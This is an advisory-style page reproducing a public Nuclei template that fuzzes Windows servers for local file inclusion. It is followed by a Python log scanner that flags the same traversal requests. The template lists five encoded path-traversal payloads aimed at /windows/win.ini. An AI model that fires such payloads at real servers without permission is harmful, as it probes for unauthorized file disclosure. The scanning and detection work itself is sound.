windows-lfi-fuzzing: Windows - Local File Inclusion Fuzzing

Date: 2025-08-01 | Affected software: Windows | PoC: public

Vulnerability description

Fuzzing for /windows/win.ini.

PoC code [public]

id: windows-lfi-fuzzing

info:
  name: Windows - Local File Inclusion Fuzzing
  author: matejsmycka
  severity: high
  description: |
    Fuzzing for /windows/win.ini.
  tags: fuzz,windows,lfi,fuzzing,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini"
      - "{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/win.ini"
      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini"
      - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
      - "{{BaseURL}}/../../../../../../windows/win.ini"

    stop-at-first-match: true

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 4a0a0047304502206fa07cb28d821067f0dacfbf8cd0444921513171ea214855b8e24f4c0ccd200a022100dea13643a53b720cee1e71b30bf3f7c0314bd9e97aeb7763c408fe2f11934a19:922c64590222798bb761d5b6d8e72950
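
A request-side detection for the encoding variants this template sends, as an added example that is not part of the original page or the template author's code: it percent-decodes the request target until it stops changing, treats backslashes as path separators, and flags any `..` segment. The log lines, `MAX_DECODE_ROUNDS` and all function names are assumptions made for the illustration.

```python
import re
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3  # assumption: enough to unwrap the double-encoded (%252e) variant

# Constructed access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2025:10:00:01 +0000] "GET /.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1" 404 153',
    '192.0.2.10 - - [01/Aug/2025:10:00:02 +0000] "GET /..%5c..%5c..%5cwindows/win.ini HTTP/1.1" 200 92',
    '198.51.100.7 - - [01/Aug/2025:10:00:03 +0000] "GET /docs/release..notes.html HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Aug/2025:10:00:04 +0000] "GET /static/app.js HTTP/1.1" 200 20480',
]

REQUEST_RE = re.compile(
    r'^(?P<client>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def normalize_target(raw: str) -> str:
    """Percent-decode until stable (bounded), then unify separators and case."""
    current = raw
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current.replace("\\", "/").lower()


def is_traversal(raw: str) -> bool:
    """True when the normalized target contains a '..' path segment."""
    return ".." in normalize_target(raw).split("/")


def scan(lines):
    """Return (client, status, normalized target) for each traversal request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if m and is_traversal(m.group("target")):
            hits.append((m.group("client"), int(m.group("status")),
                         normalize_target(m.group("target"))))
    return hits


if __name__ == "__main__":
    for client, status, target in scan(SAMPLE_LOG):
        # A 200 on a traversal request deserves a look at the response body.
        print(f"{client} status={status} {target}")
```

Matching on whole `..` segments after normalization keeps names such as `release..notes.html` from being flagged while still catching all five path forms in the template.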
